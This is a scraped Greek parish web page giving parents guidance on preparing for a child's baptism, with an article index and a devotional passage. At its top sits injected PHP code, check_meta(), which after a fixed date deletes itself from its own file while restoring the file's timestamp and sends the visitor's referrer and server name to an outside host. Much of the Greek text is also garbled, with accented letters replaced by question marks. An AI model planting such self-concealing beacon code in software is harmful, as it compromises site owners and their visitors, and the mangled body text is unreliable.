check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456732960){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776828&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_search/models/content.php"); } Η Βάπτιση, Μυστήριο της Εκκλησίας. Για τους γονείς
Η Βάπτιση, Μυστήριο της Εκκλησίας. Για τους γονείς Εκτύπωση E-mail
Ευρετήριο Άρθρου
Η Βάπτιση, Μυστήριο της Εκκλησίας. Για τους γονείς
Που θα γίνει η βάπτιση;
Πότε θα γίνει η βάπτιση;
Η προετοιμασία
Ο ανάδοχος
Το όνομα
Ο στολισμός του Ναού
Η παρουσία μας στο μυστήριο
Μετά τη βάπτιση
Δικαιολογητικά
Δείτε το έντυπο
Όλες οι Σελίδες

ΠΡΟΕΤΟΙΜΑΣΙΑ ΚΑΙ ΣΥΜΜΕΤΟΧΗ

?γαπητοί γονε?ς,

? χαρά σας ε?ναι μεγάλη καθώς ?τοιμάζεστε γιά τή βάπτιση το? παιδιο? σας. Κι ?λες ο? χα­ρούμενες φροντίδες σας στρέφονται γύρω ?πό τά βαπτιστικά, τούς καλεσμένους, τόν ?νάδο­χο, τό ?νομα, τό τραπέζι. ?χετε ?μως σκεφτε?, ?σο πλησιάζει ? μέρα, τή βάπτιση ?χι σάν κοι­νωνικό γεγονός ?λλά ?ς Μυστήριο τ?ς ?κκλησίας;

? Κύριός μας ?ησο?ς Χριστός βεβαιώνει ?τι «?ποιος δέν γεννηθε? ?πό τό νερό κι ?πό τό Πνε?μα, δέν μπορε? νά μπε? στή Βασιλεία το? Θεο?» (?ω. 3,5) γιατί «? πιστεύσας καί βαπτι­σθείς σωθήσεται» (Μάρκ. 16,16). Τό Βάπτισμα δέν ε?ναι μιά συμβολική τελετή ?λλά ?να γε­γονός μέ ?παρξιακές διαστάσεις.

Στή βάπτιση θά γεννηθε? πραγματικά τό παιδί σας! ?κε?, στήν κολυμβήθρα, τήν πνευματι­κή μήτρα τ?ς ?κκλησίας, ? παλαιός ?νθρωπος τ?ς φθορ?ς θά πεθάνει καί θά ?πορριφθε?, γιά νά ?ναγεννηθε? ? νέος τ?ς ?φθαρσίας ?πως πέθανε καί ?ναστήθηκε ? Χριστός. ?κε? τό παιδί σας θά ?νσωματωθε? στό σ?μα το? Χριστο? πού ε?ναι ? ?κκλησία, ?πως ?να κλαδί μπολιάζεται στόν κορμό το? δένδρου. Θά γίνει ναός το? Θεο? γιατί τό ?γιο Πνε?μα μέ τά χα­ρίσματά του θά κατοικήσει πλέον μέσα του. ?πό ?κείνη τήν ?μέρα τό ?νομά του θά γραφτε? στό βιβλίο τ?ς ζω?ς, προορισμένο γιά τήν α?ωνιότητα! ?νας ?γγελος θά τό συνοδεύει πλέ­ον σέ ?λη του τή ζωή ?χώριστος σύντροφός του σέ κάθε στιγμή καί καμιά δαιμονική ?νέρ­γεια δέν θά ε?ναι σέ θέση νά τό βλάψει. ? Θεός θά ?κούει προσεκτικά τίς προσευχές του καί τό βλέμμα του θά ε?ναι διαρκ?ς στραμμένο πάνω του μέ ?διαίτερη φροντίδα.

Στά χέρια σας, πλέον, δέν θά κρατ?τε ?πλά τό παιδί σας, πού ?ναμφίβολα ε?ναι ?να ?νεκτί­μητο δ?ρο το? Θεο? σέ σ?ς, ?λλά μιά ζωντανή ε?κόνα το? Θεο?· ?να μελλοντικό πολίτη τ?ς Βασιλείας τ?ν ο?ραν?ν.

Χαρε?τε, λοιπόν, μαζί μέ τό παιδί σας α?τήν τήν προσωπική του Πεντηκοστή ?πως ο? πρώτοι πιστοί, ο? ?πο?οι, ?ταν συνειδητοποίησαν τί συνέβη στό ?περ?ο τ?ς ?ερουσαλήμ, «κατενύγησαν τ? καρδί?» (Πράξ. 2,37)· γέμισε ? καρδιά τους μέ ?ερό δέος, συγκίνηση καί κατάνυξη! Γιατί α?τό πού ?ξωτερικά μοιάζει μέ ?να συνηθισμένο λουτρό πού κάνετε καθημερινά στό παιδί σας, ε?ναι ?να μεγαλει?δες ?παρξιακό γεγονός μέ α?ώνια προοπτική. ?τσι ?μως συμβαίνει μέ ?λα τά μυστήρια: μέσα ?πό ?πλά ?λικά στοιχε?α κα? συνηθισμένες πράξεις ?νεργε? ? δύναμη το? Θεο?, πού ?νακαινίζει καί χαριτώνει ?μ?ς τούς ?νθρώπους. ?ρκε? νά πιστέψουμε καί νά ?κζητήσουμε τή σωστική χάρη το? Κυρίου.
 
 

Παντρεύεστε;

apokatastash steghs

Βαπτίζετε το παιδί σας;

Γίνεσται ανάδοχος;